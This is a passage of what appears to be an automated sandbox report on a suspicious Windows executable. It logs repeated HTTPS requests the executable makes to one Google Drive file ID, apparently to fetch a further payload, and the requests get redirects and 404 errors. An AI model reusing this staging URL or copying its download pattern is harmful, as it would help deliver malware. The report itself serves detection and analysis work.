                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.549918142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:00 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:01 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:00 GMT
                                                                    Content-Security-Policy: script-src 'nonce-le89ienv9uR7cASyrPCOFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5t0y2VtM-CK-EbMKeuohZ7EZ33MFn_5dSNgMjtAUCn_ClnbzqwZJMqZCfeP1avlzNYtcTkifFe7A
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 63 56 73 37 5f 7a 69 52 73 6c 70 37 6c 63 72 78 6d 42 4b 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tcVs7_ziRslp7lcrxmBKRg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.549922172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:02 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:04 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:03 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce--i21_7WhLVsTC9Gyza2DWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.549926142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:05 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:06 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:06 GMT
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-NC1mfIp3WMlTLw0xppNdiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC7cWWTZeWJfD90XXaSqZQVdCM0zBf2bmj-R7i3r4NmXeT56BbsSLMj5gdgMUFCadqp-fM3HnY0rIw
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 67 67 6a 78 53 6c 61 54 79 43 47 46 35 36 48 51 41 74 59 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hggjxSlaTyCGF56HQAtY4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.549931172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:08 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:09 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:09 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-_oT0Jsfbz4UiLwOgmBU_OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.549937142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:11 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:12 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:11 GMT
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-xUDY6CkoU7E52uc_kdM4cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC6ByAr539xd3V7MxLKzhTtql6HdNWSZ6ktJXRrgn8eIM1yqzjYCk3fb8YlRTsho7XjX3pEknKsJ3A
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 47 56 77 6b 44 45 43 67 62 6f 54 2d 59 36 43 5a 61 31 48 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nGVwkDECgboT-Y6CZa1HpA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.549943172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:14 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:15 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:14 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-Ts9vIN3hI0ZS7OxPuMEuPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.549950142.250.181.334432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:17 UTC459OUTGET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:18 UTC1854INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Tue, 03 Dec 2024 16:25:17 GMT
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-2j4stuyg7KoLcVdUEhjvMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Length: 1652
                                                                    X-GUploader-UploadID: AFiumC5W6vDrPilNTHMEAhKAbFG2rH-PwxMfbrHHuy-YT5fA2KfQ5kpY-6NYLI3k6gWsiPFOmMA5bDtpkg
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
                                                                    2024-12-03 16:25:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 4e 4a 49 64 38 61 51 6f 6e 53 6a 56 79 6e 42 6b 54 44 73 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8NJId8aQonSjVynBkTDslw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.549951172.217.19.1744432200C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-03 16:25:19 UTC417OUTGET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
                                                                    2024-12-03 16:25:20 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
